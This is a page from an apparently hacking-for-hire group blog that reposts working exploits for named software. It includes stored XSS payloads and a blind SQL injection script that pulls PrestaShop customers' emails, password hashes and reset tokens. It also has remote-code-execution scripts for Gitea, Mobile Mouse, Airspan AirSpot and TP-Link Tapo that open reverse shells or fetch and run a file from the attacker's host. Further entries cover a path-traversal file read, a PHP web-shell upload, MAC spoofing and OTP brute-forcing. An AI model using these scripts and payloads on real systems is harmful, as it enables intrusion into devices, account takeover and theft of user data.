Jump to content

Hacker Technology

A group blog by Leader in Hacker Website - Providing Professional Ethical Hacking Services

  • Entries

    16114

  • Comments

    7952

  • Views

    863128685

Contributors to this blog

  • HireHackking 16114

About this blog

Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.

HireHackking 
# Exploit Title:  ThingsBoard 3.3.1 'name' - Stored Cross-Site Scripting (XSS)
# Date: 03/08/2022
# Exploit Author: Steffen Langenfeld & Sebastian Biehler
# Vendor Homepage: https://thingsboard.io/
# Software Link: https://github.com/thingsboard/thingsboard/releases/tag/v3.3.1
# Version: 3.3.1
# CVE : CVE-2021-42750
# Tested on: Linux

#Proof-Of-Concept:
When creating a rule node (any) and putting a script payload inside the name of the rule node, it is executed upon hovering above the node within the editor.

#Steps

1. Create a new rule node (via the menu "Rule chains")
2. Put a javascript payload within the name e.g <script>alert('XSS')</script>
3. Save the node
4. Upon hovering above the node within the editor the payload is executed
HireHackking 
# Exploit Title: Feehi CMS 2.1.1 - Stored Cross-Site Scripting (XSS)
# Date: 02-08-2022
# Exploit Author: Shivam Singh
# Vendor Homepage: https://feehi.com/
# Software Link: https://github.com/liufee/cms
#Profile Link: https://www.linkedin.com/in/shivam-singh-3906b0203/
# Version: 2.1.1 (REQUIRED)
# Tested on: Linux, Windows, Docker
# CVE : CVE-2022-34140


# Proof of Concept:
1-Sing-up https://localhost.cms.feehi/
2-Inject The XSS Payload in Username:
"><script>alert(document.cookie)</script> fill all required fields and
click the SignUp button
3-Login to Your Account, Go to any article page then XSS will trigger.
HireHackking 
# Exploit Title: Prestashop blockwishlist module 2.1.0 - SQLi
# Date: 29/07/22
# Exploit Author: Karthik UJ (@5up3r541y4n)
# Vendor Homepage: https://www.prestashop.com/en
# Software Link (blockwishlist): https://github.com/PrestaShop/blockwishlist/releases/tag/v2.1.0
# Software Link (prestashop): https://hub.docker.com/r/prestashop/prestashop/
# Version (blockwishlist): 2.1.0
# Version (prestashop): 1.7.8.1
# Tested on: Linux
# CVE: CVE-2022-31101


# This exploit assumes that the website uses 'ps_' as prefix for the table names since it is the default prefix given by PrestaShop

import requests

url = input("Enter the url of wishlist's endpoint (http://website.com/module/blockwishlist/view?id_wishlist=1): ") # Example: http://website.com/module/blockwishlist/view?id_wishlist=1
cookie = input("Enter cookie value:\n")

header = {
    "Cookie": cookie
}

# Define static stuff
param = "&order="
staticStart = "p.name, (select case when ("
staticEnd = ") then (SELECT SLEEP(7)) else 1 end); -- .asc"
charset = 'abcdefghijklmnopqrstuvwxyz1234567890_-@!#$%&\'*+/=?^`{|}~'
charset = list(charset)
emailCharset = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890_-@!#$%&\'*+/=?^`{|}~.'
emailCharset = list(emailCharset)


# Query current database name length
print("\nFinding db name's length:")
for length in range(1, 65):
    condition = "LENGTH(database())=" + str(length)
    fullUrl = url + param + staticStart + condition + staticEnd

    try:
        req = requests.get(fullUrl, headers=header, timeout=8)
    except requests.exceptions.Timeout:
        dbLength=length
        print("Length: ", length, end='')
        print("\n")
        break

print("Enumerating current database name:")
databaseName = ''
for i in range(1, dbLength+1):
    for char in charset:
        condition = "(SUBSTRING(database()," + str(i) + ",1)='" + char + "')"
        fullUrl = url + param + staticStart + condition + staticEnd

        try:
            req = requests.get(fullUrl, headers=header, timeout=8)
        except requests.exceptions.Timeout:
            print(char, end='')
            databaseName += char
            break
print()

# Enumerate any table
prefix = "ps_"
tableName = prefix + "customer"
staticStart = "p.name, (select case when ("
staticEnd1 = ") then (SELECT SLEEP(7)) else 1 end from " + tableName + " where id_customer="
staticEnd2 = "); -- .asc"

print("\nEnumerating " + tableName + " table")

for id in range(1, 10):

    condition = "id_customer=" + str(id)
    fullUrl = url + param + staticStart + condition + staticEnd1 + str(id) + staticEnd2

    try:
        req = requests.get(fullUrl, headers=header, timeout=8)
        print("\nOnly " + str(id - 1) + " records found. Exiting...")
        break
    except requests.exceptions.Timeout:
        pass

    print("\nid = " + str(id))

    # Finding firstname length
    for length in range(0, 100):
        condition = "LENGTH(firstname)=" + str(length)
        fullUrl = url + param + staticStart + condition + staticEnd1 + str(id) + staticEnd2
        
        try:
            req = requests.get(fullUrl, headers=header, timeout=8)
        except requests.exceptions.Timeout:
            firstnameLength=length
            print("Firstname length: ", length, end='')
            print()
            break
        
    
    # Enumerate firstname
    firstname = ''
    print("Firstname: ", end='')
    for i in range(1, length+1):
        for char in charset:
            condition = "SUBSTRING(firstname," + str(i) + ",1)='" + char + "'"
            fullUrl = url + param + staticStart + condition + staticEnd1 + str(id) + staticEnd2

            try:
                req = requests.get(fullUrl, headers=header, timeout=8)
            except requests.exceptions.Timeout:
                print(char, end='')
                firstname += char
                break
    print()

    # Finding lastname length
    for length in range(1, 100):
        condition = "LENGTH(lastname)=" + str(length)
        fullUrl = url + param + staticStart + condition + staticEnd1 + str(id) + staticEnd2
        
        try:
            req = requests.get(fullUrl, headers=header, timeout=8)
        except requests.exceptions.Timeout:
            lastnameLength=length
            print("Lastname length: ", length, end='')
            print()
            break
    
    # Enumerate lastname
    lastname = ''
    print("Lastname: ", end='')
    for i in range(1, length+1):
        for char in charset:
            condition = "SUBSTRING(lastname," + str(i) + ",1)='" + char + "'"
            fullUrl = url + param + staticStart + condition + staticEnd1 + str(id) + staticEnd2

            try:
                req = requests.get(fullUrl, headers=header, timeout=8)
            except requests.exceptions.Timeout:
                print(char, end='')
                firstname += char
                break
    print()

    # Finding email length
    for length in range(1, 320):
        condition = "LENGTH(email)=" + str(length)
        fullUrl = url + param + staticStart + condition + staticEnd1 + str(id) + staticEnd2
        
        try:
            req = requests.get(fullUrl, headers=header, timeout=8)
        except requests.exceptions.Timeout:
            emailLength=length
            print("Email length: ", length, end='')
            print()
            break    

    # Enumerate email
    email = ''
    print("Email: ", end='')
    for i in range(1, length+1):
        for char in emailCharset:
            condition = "SUBSTRING(email," + str(i) + ",1)= BINARY '" + char + "'"
            fullUrl = url + param + staticStart + condition + staticEnd1 + str(id) + staticEnd2

            try:
                req = requests.get(fullUrl, headers=header, timeout=8)
                if req.status_code == 500 and char == '.':
                    print(char, end='')
                    email += char
            except requests.exceptions.Timeout:
                print(char, end='')
                email += char
                break
    print()

    # Finding password hash length
    for length in range(1, 500):
        condition = "LENGTH(passwd)=" + str(length)
        fullUrl = url + param + staticStart + condition + staticEnd1 + str(id) + staticEnd2
        
        try:
            req = requests.get(fullUrl, headers=header, timeout=8)
        except requests.exceptions.Timeout:
            passwordHashLength=length
            print("Password hash length: ", length, end='')
            print()
            break    

    # Enumerate password hash
    passwordHash = ''
    print("Password hash: ", end='')
    for i in range(1, length+1):
        for char in emailCharset:
            condition = "SUBSTRING(passwd," + str(i) + ",1)= BINARY '" + char + "'"
            fullUrl = url + param + staticStart + condition + staticEnd1 + str(id) + staticEnd2

            try:
                req = requests.get(fullUrl, headers=header, timeout=8)
                if req.status_code == 500 and char == '.':
                    print(char, end='')
                    passwordHash += char
            except requests.exceptions.Timeout:
                print(char, end='')
                passwordHash += char
                break
    print()

    # Finding password reset token length
    for length in range(0, 500):
        condition = "LENGTH(reset_password_token)=" + str(length)
        fullUrl = url + param + staticStart + condition + staticEnd1 + str(id) + staticEnd2
        
        try:
            req = requests.get(fullUrl, headers=header, timeout=8)
        except requests.exceptions.Timeout:
            passwordResetTokenLength=length
            print("Password reset token length: ", length, end='')
            print()
            break    

    # Enumerate password reset token
    passwordResetToken = ''
    print("Password reset token: ", end='')
    for i in range(1, length+1):
        for char in emailCharset:
            condition = "SUBSTRING(reset_password_token," + str(i) + ",1)= BINARY '" + char + "'"
            fullUrl = url + param + staticStart + condition + staticEnd1 + str(id) + staticEnd2

            try:
                req = requests.get(fullUrl, headers=header, timeout=8)
                if req.status_code == 500 and char == '.':
                    print(char, end='')
                    passwordResetToken += char
            except requests.exceptions.Timeout:
                print(char, end='')
                passwordResetToken += char
                break
    print()
HireHackking 
# Exploit Title: ThingsBoard 3.3.1 'description' - Stored Cross-Site Scripting (XSS)
# Date: 03/08/2022
# Exploit Author: Steffen Langenfeld & Sebastian Biehler
# Vendor Homepage: https://thingsboard.io/
# Software Link: https://github.com/thingsboard/thingsboard/releases/tag/v3.3.1
# Version: 3.3.1
# Tested on: [relevant os]
# CVE : CVE-2021-42751
# Tested on: Linux

#Proof-Of-Concept:
When creating a rule node (any) and putting a script payload inside the description of the rule node, it is executed upon hovering above the node within the editor.

#Steps

1. Create a new rule node (via the menu "Rule chains")
2. Put a javascript payload within the description e.g <script>alert('XSS')</script>
3. Save the node
4. Upon hovering above the node within the editor the payload is executed
HireHackking
# Exploit Title: WordPress Plugin Testimonial Slider and Showcase 2.2.6 - Stored Cross-Site Scripting (XSS) # Date: 05/08/2022 # Exploit Author: saitamang , yunaranyancat , syad # Vendor Homepage: https://wordpress.org # Software Link: https://wordpress.org/plugins/testimonial-slider-and-showcase/ # Version: 2.2.6 # Tested on: Centos 7 apache2 + MySQL WordPress Plugin "Testimonial Slider and Showcase" is prone to a cross-site scripting (XSS) vulnerability because it fails to properly sanitize user-supplied input. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. WordPress Plugin "Testimonial Slider and Showcase" version 2.2.6 is vulnerable; prior versions may also be affected. Login as Editor > Add testimonial > Under Title inject payload below ; parameter (post_title parameter) > Save Draft > Preview the post payload --> test"/><img/src=""/onerror=alert(document.cookie)> The draft post can be viewed using the Editor account or Admin account and XSS will be triggered once clicked.
HireHackking

Title: MAC address spoofing in Windows 10 and Linux

HACKER · %s · %s

In this article, you will learn how to manually change mac addresses in Windows and Linux (ubuntu and Kali Linux) and through macchanger software.
I have written an article about MAC before, and everyone has a preliminary understanding of MAC. So can MAC change?
The answer is no. The MAC address is written directly by the manufacturer and cannot be changed, but we can simulate the MAC address through software to complete the deception!
A MAC address is the unique identifier of computers around the world, and each device in a network is identified by its physical address, whether the network is local or public. When data is transmitted over the network, it also includes the MAC address values of the target device and the source device.
Why should I change to mac
Sometimes, we take advantage of the Internet. He was blocked from the router and could not access the Internet. At this time, you need to change the MAC address.
Modify mac in windows 10
First open cmd-ipconfig/all to view the mac address of the machine
2 Select the adapter and right-click it, and then click Properties.
3 Click Configuration - Advanced - Network Address - Value to modify the value inside!
Perform MAC fraud
In kali we use macchanger to complete deception.
If you are from other debian and unbunt series, you can directly execute apt-get install macchanger installation.
Or use the following command to view
macchanger -s eth0ech0 spoof macchanger for your local network card -m AA:AA:AA:AA:AA:AA:AA eth0
In this way, we have completed the mac address spoofing, it’s simple!
HireHackking

Gitea 1.16.6 - Remote Code Execution (RCE) (Metasploit)

HACKER · %s · %s

# Exploit Title: Gitea Git Fetch Remote Code Execution # Date: 09/14/2022 # Exploit Author: samguy # Vendor Homepage: https://gitea.io # Software Link: https://dl.gitea.io/gitea/1.16.6 # Version: <= 1.16.6 # Tested on: Linux - Debian # Ref : https://tttang.com/archive/1607/ # CVE : CVE-2022-30781 ## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking prepend Msf::Exploit::Remote::AutoCheck include Msf::Exploit::Remote::HttpClient include Msf::Exploit::Remote::HttpServer def initialize(info = {}) super( update_info( info, 'Name' => 'Gitea Git Fetch Remote Code Execution', 'Description' => %q{ This module exploits Git fetch command in Gitea repository migration process that leads to a remote command execution on the system. This vulnerability affect Gitea before 1.16.7 version. }, 'Author' => [ 'wuhan005 & li4n0', # Original PoC 'krastanoel' # MSF Module ], 'References' => [ ['CVE', '2022-30781'], ['URL', 'https://tttang.com/archive/1607/'] ], 'DisclosureDate' => '2022-05-16', 'License' => MSF_LICENSE, 'Platform' => %w[unix win], 'Arch' => ARCH_CMD, 'Privileged' => false, 'Targets' => [ [ 'Unix Command', { 'Platform' => 'unix', 'Arch' => ARCH_CMD, 'Type' => :unix_cmd, 'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse_bash' } } ], ], 'DefaultOptions' => { 'WfsDelay' => 30 }, 'DefaultTarget' => 0, 'Notes' => { 'Stability' => [CRASH_SAFE], 'Reliability' => [REPEATABLE_SESSION], 'SideEffects' => [] } ) ) register_options([ Opt::RPORT(3000), OptString.new('TARGETURI', [true, 'Base path', '/']), OptString.new('USERNAME', [true, 'Username to authenticate with']), OptString.new('PASSWORD', [true, 'Password to use']), OptInt.new('HTTPDELAY', [false, 'Number of seconds the web server will wait', 12]) ]) end def check res = send_request_cgi( 'method' => 'GET', 'uri' => normalize_uri(target_uri.path, '/user/login'), 'keep_cookies' => true ) return CheckCode::Unknown('No response from the web service') if res.nil? return CheckCode::Safe("Check TARGETURI - unexpected HTTP response code: #{res.code}") if res.code != 200 # Powered by Gitea Version: 1.16.6 unless (match = res.body.match(/Gitea Version: (?<version>[\da-zA-Z.]+)/)) return CheckCode::Unknown('Target does not appear to be running Gitea.') end if match[:version].match(/[a-zA-Z]/) return CheckCode::Unknown("Unknown Gitea version #{match[:version]}.") end res = send_request_cgi( 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, '/user/login'), 'vars_post' => { 'user_name' => datastore['USERNAME'], 'password' => datastore['PASSWORD'], '_csrf' => get_csrf(res.get_cookies) }, 'keep_cookies' => true ) return CheckCode::Safe('Authentication failed') if res&.code != 302 if Rex::Version.new(match[:version]) <= Rex::Version.new('1.16.6') return CheckCode::Appears("Version detected: #{match[:version]}") end CheckCode::Safe("Version detected: #{match[:version]}") rescue ::Rex::ConnectionError return CheckCode::Unknown('Could not connect to the web service') end def primer ['/api/v1/version', '/api/v1/settings/api', "/api/v1/repos/#{@migrate_repo_path}", "/api/v1/repos/#{@migrate_repo_path}/pulls", "/api/v1/repos/#{@migrate_repo_path}/topics" ].each { |uri| hardcoded_uripath(uri) } # adding resources vprint_status("Creating repository \"#{@repo_name}\"") gitea_create_repo vprint_good('Repository created') vprint_status("Migrating repository") gitea_migrate_repo end def exploit @repo_name = rand_text_alphanumeric(6..15) @migrate_repo_name = rand_text_alphanumeric(6..15) @migrate_repo_path = "#{datastore['username']}/#{@migrate_repo_name}" datastore['URIPATH'] = "/#{@migrate_repo_path}" Timeout.timeout(datastore['HTTPDELAY']) { super } rescue Timeout::Error [@repo_name, @migrate_repo_name].map { |name| gitea_remove_repo(name) } cleanup # removing all resources end def get_csrf(cookies) csrf = cookies&.split("; ")&.grep(/_csrf=/)&.join&.split("=")&.last fail_with(Failure::UnexpectedReply, 'Unable to get CSRF token') unless csrf csrf end def gitea_remove_repo(name) vprint_status("Cleanup: removing repository \"#{name}\"") uri = "/#{datastore['username']}/#{name}/settings" res = send_request_cgi( 'method' => 'GET', 'uri' => normalize_uri(target_uri.path, uri), 'keep_cookies' => true ) res = send_request_cgi( 'method' => 'POST', 'uri' => uri, 'vars_post' => { 'action' => 'delete', 'repo_name' => name, '_csrf' => get_csrf(res.get_cookies) }, 'keep_cookies' => true ) vprint_warning('Unable to remove repository') if res&.code != 302 end def gitea_create_repo uri = normalize_uri(target_uri.path, '/repo/create') res = send_request_cgi('method' => 'GET', 'uri' => uri, 'keep_cookies' => true) @uid = res&.get_html_document&.at('//input[@id="uid"]/@value')&.text fail_with(Failure::UnexpectedReply, 'Unable to get repo uid') unless @uid res = send_request_cgi( 'method' => 'POST', 'uri' => uri, 'vars_post' => { 'uid' => @uid, 'auto_init' => 'on', 'readme' => 'Default', 'repo_name' => @repo_name, 'trust_model' => 'default', 'default_branch' => 'master', '_csrf' => get_csrf(res.get_cookies) }, 'keep_cookies' => true ) fail_with(Failure::UnexpectedReply, 'Unable to create repo') if res&.code != 302 rescue ::Rex::ConnectionError return CheckCode::Unknown('Could not connect to the web service') end def gitea_migrate_repo res = send_request_cgi( 'method' => 'GET', 'uri' => normalize_uri(target_uri.path, '/repo/migrate'), 'keep_cookies' => true ) uri = res&.get_html_document&.at('//svg[@class="svg gitea-gitea"]/ancestor::a/@href')&.text fail_with(Failure::UnexpectedReply, 'Unable to get Gitea service type') unless uri svc_type = Rack::Utils.parse_query(URI.parse(uri).query)['service_type'] res = send_request_cgi( 'method' => 'GET', 'uri' => normalize_uri(target_uri.path, uri), 'keep_cookies' => true ) res = send_request_cgi( 'method' => 'POST', 'uri' => uri, 'vars_post' => { 'uid' => @uid, 'service' => svc_type, 'pull_requests' => 'on', 'repo_name' => @migrate_repo_name, '_csrf' => get_csrf(res.get_cookies), 'auth_token' => rand_text_alphanumeric(6..15), 'clone_addr' => "http://#{srvhost_addr}:#{srvport}/#{@migrate_repo_path}", }, 'keep_cookies' => true ) if res&.code != 302 # possibly triggered by the [migrations] settings err = res&.get_html_document&.at('//div[contains(@class, flash-error)]/p')&.text gitea_remove_repo(@repo_name) cleanup fail_with(Failure::UnexpectedReply, "Unable to migrate repo: #{err}") end rescue ::Rex::ConnectionError return CheckCode::Unknown('Could not connect to the web service') end def on_request_uri(cli, req) case req.uri when '/api/v1/version' send_response(cli, '{"version": "1.16.6"}') when '/api/v1/settings/api' data = { 'max_response_items':50,'default_paging_num':30, 'default_git_trees_per_page':1000,'default_max_blob_size':10485760 } send_response(cli, data.to_json) when "/api/v1/repos/#{@migrate_repo_path}" data = { "clone_url": "#{full_uri}#{datastore['username']}/#{@repo_name}", "owner": { "login": datastore['username'] } } send_response(cli, data.to_json) when "/api/v1/repos/#{@migrate_repo_path}/topics?limit=0&page=1" send_response(cli, '{"topics":[]}') when "/api/v1/repos/#{@migrate_repo_path}/pulls?limit=50&page=1&state=all" data = [ { "base": { "ref": "master", }, "head": { "ref": "--upload-pack=#{payload.encoded}", "repo": { "clone_url": "./", "owner": { "login": "master" }, } }, "updated_at": "2001-01-01T05:00:00+01:00", "user": {} } ] send_response(cli, data.to_json) end end end
HireHackking

Mobile Mouse 3.6.0.4 - Remote Code Execution (RCE)

HACKER · %s · %s

# Exploit Title: Mobile Mouse 3.6.0.4 - Remote Code Execution (RCE) # Date: Aug 09, 2022 # Exploit Author: Chokri Hammedi # Vendor Homepage: https://mobilemouse.com/ # Software Link: https://www.mobilemouse.com/downloads/setup.exe # Version: 3.6.0.4 # Tested on: Windows 10 Enterprise LTSC Build 17763 #!/usr/bin/env python3 import socket from time import sleep import argparse help = " Mobile Mouse 3.6.0.4 Remote Code Execution " parser = argparse.ArgumentParser(description=help) parser.add_argument("--target", help="Target IP", required=True) parser.add_argument("--file", help="File name to Upload") parser.add_argument("--lhost", help="Your local IP", default="127.0.0.1") args = parser.parse_args() host = args.target command_shell = args.file lhost = args.lhost port = 9099 # Default Port s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((host, port)) CONN = bytearray.fromhex("434F4E4E4543541E1E63686F6B726968616D6D6564691E6950686F6E651E321E321E04") s.send(CONN) run = s.recv(54) RUN = bytearray.fromhex("4b45591e3131341e721e4f505404") s.send(RUN) run = s.recv(54) sleep(0.5) download_string= f"curl http://{lhost}:8080/{command_shell} -o c:\Windows\Temp\{command_shell}".encode('utf-8') hex_shell = download_string.hex() SHELL = bytearray.fromhex("4B45591E3130301E" + hex_shell + "1E04" + "4b45591e2d311e454e5445521e04") s.send(SHELL) shell = s.recv(96) print ("Executing The Command Shell...") sleep(1.2) RUN2 = bytearray.fromhex("4b45591e3131341e721e4f505404") s.send(RUN2) run2 = s.recv(54) shell_string= f"c:\Windows\Temp\{command_shell}".encode('utf-8') hex_run = shell_string.hex() RUN3 = bytearray.fromhex("4B45591E3130301E" + hex_run + "1E04" + "4b45591e2d311e454e5445521e04") s.send(RUN3) run3 = s.recv(96) print (" Take The Rose") sleep(10) s.close()
HireHackking

Bookwyrm v0.4.3 - Authentication Bypass

HACKER · %s · %s

# Exploit Title: Bookwyrm v0.4.3 - Authentication Bypass # Date: 2022-08-4 # Exploit Author: Akshay Ravi # Vendor Homepage: https://github.com/bookwyrm-social/bookwyrm # Software Link: https://github.com/bookwyrm-social/bookwyrm/releases/tag/v0.4.3 # Version: <= 4.0.3 # Tested on: MacOS Monterey # CVE: CVE-2022-2651 # Original Report Link: https://huntr.dev/bounties/428eee94-f1a0-45d0-9e25-318641115550/ Description: Email Verification Bypass Leads To Account Takeover in bookwyrm-social/bookwyrm v0.4.3 Due To Lack Of Ratelimit Protection # Steps to reproduce: 1. Create a acount with victims email id 2. When the account is created, its ask for email confirmation via validating OTP Endpoint: https://site/confirm-email 3. Enter any random OTP and try to perfrom bruteforce attack and if otp matches, We can takeover that account
HireHackking
# Exploit Title: Airspan AirSpot 5410 version 0.3.4.1 - Remote Code Execution (RCE) # Date: 7/26/2022 # Exploit Author: Samy Younsi (NSLABS) (https://samy.link) # Vendor Homepage: https://www.airspan.com/ # Software Link: https://wdi.rfwel.com/cdn/techdocs/AirSpot5410.pdf # Version: 0.3.4.1-4 and under. # Tested on: Airspan AirSpot 5410 version 0.3.4.1-4 (Ubuntu) # CVE : CVE-2022-36267 from __future__ import print_function, unicode_literals import argparse import requests import urllib3 urllib3.disable_warnings() def banner(): airspanLogo = """ ,-. / \ `. __..-,O : \ --''_..-'.' | . .-' `. '. : . .`.' \ `. / .. \ `. ' . `, `. \ ,|,`. `-.\ '.|| ``-...__..-` | | Airspan |__| AirSpot 5410 /||\ PWNED x_x //||\\ // || \\ __//__||__\\__ '--------------'Necrum Security Labs \033[1;92mSamy Younsi (Necrum Security Labs)\033[1;m \033[1;91mAirSpot 5410 CMD INJECTION\033[1;m FOR EDUCATIONAL PURPOSE ONLY. """ return print('\033[1;94m{}\033[1;m'.format(airspanLogo)) def pingWebInterface(RHOST, RPORT): url = 'https://{}:{}'.format(RHOST, RPORT) try: response = requests.get(url, allow_redirects=False, verify=False, timeout=30) if response.status_code != 200: print('[!] \033[1;91mError: AirSpot 5410 device web interface is not reachable. Make sure the specified IP is correct.\033[1;m') exit() print('[INFO] Airspan device web interface seems reachable!') except: print('[!] \033[1;91mError: AirSpot 5410 device web interface is not reachable. Make sure the specified IP is correct.\033[1;m') exit() def execReverseShell(RHOST, RPORT, LHOST, LPORT): payload = '`sh%20-i%20%3E%26%20%2Fdev%2Ftcp%2F{}%2F{}%200%3E%261`'.format(LHOST, LPORT) data = 'Command=pingDiagnostic&targetIP=1.1.1.1{}&packetSize=55&timeOut=10&count=1'.format(payload) try: print('[INFO] Executing reverse shell...') response = requests.post('https://{}:{}/cgi-bin/diagnostics.cgi'.format(RHOST, RPORT), data=data, verify=False) print("Reverse shell successfully executed. {}:{}".format(LHOST, LPORT)) return except Exception as e: print("Reverse shell failed. Make sure the AirSpot 5410 device can reach the host {}:{}").format(LHOST, LPORT) return False def main(): banner() args = parser.parse_args() pingWebInterface(args.RHOST, args.RPORT) execReverseShell(args.RHOST, args.RPORT, args.LHOST, args.LPORT) if __name__ == "__main__": parser = argparse.ArgumentParser(description='Script PoC that exploit an nauthenticated remote command injection on Airspan AirSpot devices.', add_help=False) parser.add_argument('--RHOST', help="Refers to the IP of the target machine. (Airspan AirSpot device)", type=str, required=True) parser.add_argument('--RPORT', help="Refers to the open port of the target machine. (443 by default)", type=int, required=True) parser.add_argument('--LHOST', help="Refers to the IP of your machine.", type=str, required=True) parser.add_argument('--LPORT', help="Refers to the open port of your machine.", type=int, required=True) main()
HireHackking

TP-Link Tapo c200 1.1.15 - Remote Code Execution (RCE)

HACKER · %s · %s

# Exploit Title: TP-Link Tapo c200 1.1.15 - Remote Code Execution (RCE) # Date: 02/11/2022 # Exploit Author: hacefresko # Vendor Homepage: https://www.tp-link.com/en/home-networking/cloud-camera/tapo-c200/ # Version: 1.1.15 and below # Tested on: 1.1.11, 1.1.14 and 1.1.15 # CVE : CVE-2021-4045 # Write up of the vulnerability: https://www.hacefresko.com/posts/tp-link-tapo-c200-unauthenticated-rce import requests, urllib3, sys, threading, os urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) PORT = 1337 REVERSE_SHELL = 'rm /tmp/f;mknod /tmp/f p;cat /tmp/f|/bin/sh -i 2>&1|nc %s %d >/tmp/f' NC_COMMAND = 'nc -lv %d' % PORT # nc command to receive reverse shell (change it depending on your nc version) if len(sys.argv) < 3: print("Usage: python3 pwnTapo.py <victim_ip> <attacker_ip>") exit() victim = sys.argv[1] attacker = sys.argv[2] print("[+] Listening on %d" % PORT) t = threading.Thread(target=os.system, args=(NC_COMMAND,)) t.start() print("[+] Serving payload to %s\n" % victim) url = "https://" + victim + ":443/" json = {"method": "setLanguage", "params": {"payload": "';" + REVERSE_SHELL % (attacker, PORT) + ";'"}} requests.post(url, json=json, verify=False)
HireHackking

Wifi HD Wireless Disk Drive 11 - Local File Inclusion

HACKER · %s · %s

# Exploit Title: Wifi HD Wireless Disk Drive 11 - Local File Inclusion # Date: Aug 13, 2022 # Exploit Author: Chokri Hammedi # Vendor Homepage: http://www.savysoda.com # Software Link: https://apps.apple.com/us/app/wifi-hd-wireless-disk-drive/id311170976 # Version: 11 # Tested on: iPhone OS 15_5 # Proof of Concept GET /../../../../../../../../../../../../../../../../etc/hosts HTTP/1.1 Host: 192.168.1.100 Connection: close Upgrade-Insecure-Requests: 1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 15_5 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.5 Safari/604.1 Referer: http://192.168.1.103/ Accept-Language: en-GB,en-US;q=0.9,en;q=0.8 Accept-Encoding: gzip, deflate ----------------- HTTP/1.1 200 OK Content-Disposition: attachment Content-Type: application/download Content-Length: 213 Accept-Ranges: bytes Date: Sat, 13 Aug 2022 03:33:30 GMT ## # Host Database # # localhost is used to configure the loopback interface # when the system is booting. Do not change this entry. ## 127.0.0.1 localhost 255.255.255.255 broadcasthost ::1 localhost
HireHackking

Feehi CMS 2.1.1 - Remote Code Execution (Authenticated)

HACKER · %s · %s

# Exploit Title: Feehi CMS 2.1.1 - Remote Code Execution (RCE) (Authenticated) # Date: 22-08-2022 # Exploit Author: yuyudhn # Vendor Homepage: https://feehi.com/ # Software Link: https://github.com/liufee/cms # Version: 2.1.1 (REQUIRED) # Tested on: Linux, Docker # CVE : CVE-2022-34140 # Proof of Concept: 1. Login using admin account at http://feehi-cms.local/admin 2. Go to Ad Management menu. http://feehi-cms.local/admin/index.php?r=ad%2Findex 3. Create new Ad. http://feehi-cms.local/admin/index.php?r=ad%2Fcreate 4. Upload php script with jpg/png extension, and using Burp suite or any tamper data browser add ons, change back the extension to php. 5. Shell location: http://feehi-cms.local/uploads/setting/ad/[some_random_id].php # Burp request example: POST /admin/index.php?r=ad%2Fcreate HTTP/1.1 Host: feehi-cms.local Content-Length: 1530 Cache-Control: max-age=0 sec-ch-ua: "Chromium";v="103", ".Not/A)Brand";v="99" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Linux" Upgrade-Insecure-Requests: 1 Origin: http://feehi-cms.local Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFBYJ8wfp9LBoF4xg User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.53 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Referer: http://feehi-cms.local/admin/index.php?r=ad%2Fcreate Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: _csrf=807bee7110e873c728188300428b64dd155c422c1ebf36205f7ac2047eef0982a%3A2%3A%7Bi%3A0%3Bs%3A5%3A%22_csrf%22%3Bi%3A1%3Bs%3A32%3A%22H9zz-zoIIPm7GEDiUGwm81TqyoAb5w0U%22%3B%7D; PHPSESSID=aa1dec72025b1524ae0156d527007e53; BACKEND_FEEHICMS=7f608f099358c22d4766811704a93375; _csrf_backend=3584dfe50d9fe91cfeb348e08be22c1621928f41425a41360b70c13e7c6bd2daa%3A2%3A%7Bi%3A0%3Bs%3A13%3A%22_csrf_backend%22%3Bi%3A1%3Bs%3A32%3A%22jQjzwf12TCyw_BLdszCqpz4zjphcQrmP%22%3B%7D Connection: close ------WebKitFormBoundaryFBYJ8wfp9LBoF4xg Content-Disposition: form-data; name="_csrf_backend" FvaDqWC07mTGiOuZr-Qzyc2NlSACNuyPM4w7qXxTgmZ8p-nTF9LfVpLLku7wpn-tvvfWUXJM2PVZ_FPKLSHvNg== ------WebKitFormBoundaryFBYJ8wfp9LBoF4xg Content-Disposition: form-data; name="AdForm[name]" rce ------WebKitFormBoundaryFBYJ8wfp9LBoF4xg Content-Disposition: form-data; name="AdForm[tips]" rce at Ad management ------WebKitFormBoundaryFBYJ8wfp9LBoF4xg Content-Disposition: form-data; name="AdForm[input_type]" 1 ------WebKitFormBoundaryFBYJ8wfp9LBoF4xg Content-Disposition: form-data; name="AdForm[ad]" ------WebKitFormBoundaryFBYJ8wfp9LBoF4xg Content-Disposition: form-data; name="AdForm[ad]"; filename="asuka.php" Content-Type: image/png <?php phpinfo(); ------WebKitFormBoundaryFBYJ8wfp9LBoF4xg Content-Disposition: form-data; name="AdForm[link]" --------------
HireHackking

Aero CMS v0.0.1 - SQLi

HACKER · %s · %s

